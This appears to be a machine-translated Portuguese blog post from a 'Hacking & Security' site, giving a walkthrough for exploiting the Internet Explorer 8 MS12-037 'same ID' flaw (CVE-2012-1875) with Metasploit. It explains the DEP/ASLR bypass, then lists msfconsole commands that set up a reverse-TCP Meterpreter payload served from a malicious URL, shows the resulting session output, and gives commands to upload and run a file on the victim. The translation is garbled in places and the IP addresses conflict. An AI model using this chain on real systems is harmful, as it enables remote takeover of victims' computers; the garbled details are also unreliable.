terça-feira, 15 de janeiro de 2013

windows Hacking usando MS12-037 Internet Explorer Vulnerabilidade mesmo ID

MS12-037 Internet Explorer Vulnerabilidade mesmo ID Microsoft Internet Explorer 8 não tratar adequadamente os objetos na memória, o que permite que atacantes remotos para executar código arbitrário, acessando um excluído objeto, também conhecido como "O mesmo ID propriedade Vulnerabilidade de execução remota de código."

Duas tecnologias no sistema operacional moderno são usados ​​para fazer façanhas desse tipo ainda mais difícil: DEP (Data Execution Prevention) e ASLR (address-space randomização layout).

DEP se destina a impedir que um aplicativo ou serviço de execução de código a partir de uma região da memória não-executável. Isso ajuda a evitar que certas façanhas código da loja através de um estouro de buffer. ( wiki )

ASLR carrega módulos de software, tais como DLLs na memória em locais aleatórios. Movendo DLLs do sistema em torno torna mais difícil para hackers para adivinhar onde encontrar as funções de biblioteca que necessitam, como URLDownloadToFile () e CreateProcess ().

Mas DEP e ASLR não fazem execução remota de código ataca impossível, apenas mais complicado.

No caso da CVE-2012-1875, ASLR pode ser ignorada por tentar forçar o Internet Explorer para localizar e carregar uma versão antiga do Microsoft C Runtime DLL - um que foi compilado antes ASLR se tornar a norma, e
portanto, não o suporta. Sempre que você carregar uma DLL não ASLR, mesmo em um programa de ASLR habilitada, você pode prever onde isso vai acabar.

E DEP é contornado usando uma técnica conhecida como ROP, ou retorno de programação orientada.

Exploit para a vulnerabilidade do Internet Explorer mesmo ID (CVE-2012-1875):


Requisitos:
  • Alvo OS: XP3
  • Atacante OS: Backtrack ou qualquer PenTesting Distros
Como de costume, você tem que criar duas máquinas virtuais em seu VirtualBox.

Preparando sistema da vítima:
Instale o XP3 em um dos VM. Alterar o adaptador de rede da VM para o Host-somente o adaptador. (Se você não sabe o que estou falando, então use este manual do Virtualbox )

Preparando o sistema Atacante:
Atualizar os módulos do Metasploit, digitando o seguinte comando no Terminal:
msfupdate

Ou você pode baixar o " ms12_037_same_id.rb módulo 'e pasta neste diretório "opt/metasploit/msf3/modules/exploits/windows/browser / /"

Configurar as definições para a sua exploração em Metasploit:
Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.

Tipo "use exploit/windows/browser/ms12_037_same_id" no console.

Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Ok, vamos lançar o exploit.

Digite "proeza" no console.


Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/".

Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:

[*] Cliente requerente: /
[*] Usando o JRE ROP
[*] Enviando html
[*] Envio de estágio (752.128 bytes) para 192.168.56.12
[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.

Agora, você pode controlar o sistema vítima de computador usando Meterpreter.

Por exemplo:

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86